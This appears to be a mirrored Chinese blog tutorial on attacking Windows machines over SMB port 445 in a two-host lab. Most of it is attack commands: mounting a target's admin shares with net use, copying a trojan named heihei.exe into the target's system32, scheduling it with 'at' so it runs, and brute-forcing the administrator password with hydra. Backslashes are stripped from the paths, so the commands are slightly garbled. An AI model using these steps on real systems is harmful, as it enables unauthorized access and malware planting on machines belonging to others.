zoukankan      html  css  js  c++  java
  • Smb(445)暴力破解与利用(实操)

    工具

    xp一台,ip:192.168.40.122

    win2003一台 , ip:192.168.0.116

    一、小技巧。

    探测端口开没开着,telnet ip 端口,跳出黑框代表开着了。平常用工具探测。

    二、用xp链接2003的c$映射到xp的k盘。

    net share 可以看到目标开启了哪些共享文件。

    net use \192.168.0.116c$,然后输入目标的账号和密码,就能连接上了。可以当网盘使用。

    这样就能把目标的共享资源映射到本地了,这里是分别映射了c$d$与share,为kjl盘。不知道为啥f盘不行。

    三、取消盘符映射

    net use 盘符 /del或者取消所有net use * /del

    四、ipc$连接后可自由选择传文件到哪并执行。

    1、net use \192.168.0.116ipc$

    2、制作木马并植入木马copy d:heihei.exe \192.168.0.116c$windowssystem32 // 把本地d盘下的文件复制到目标的c盘windowssystem32 下。

    3、定时上线:net time \192.168.0.116 //查看目标机器的系统时间

    at \192.168.0.116 时间(例如16:49)"c: windowssystem32heihei.exe"

    at \192.168.0.116查看待运行任务。

    四、暴力破解目标账号密码

    可用工具:NTscan,hydra

    hydra.exe -l administrator -P e:pass.txt 192.168.0.116 telnet //爆破密码

    hydra.exe -l 账号 -P 密码本 ip 协议(ftp、smb)

    hydra.exe -L 账号字典 -P 密码字典192.168.0.116 telnet

  • 相关阅读:
    日期操作
    sanchi
    502 Server dropped connection
    把项目挂载到composer上
    从composer上在本地创建一个项目
    初始化后,composer安装
    在项目目录初始化composer
    Linux安装composer
    linux网络编程之TCP/IP基础
    grep的用法
  • 原文地址:https://www.cnblogs.com/sunny11/p/14076283.html
Copyright © 2011-2022 走看看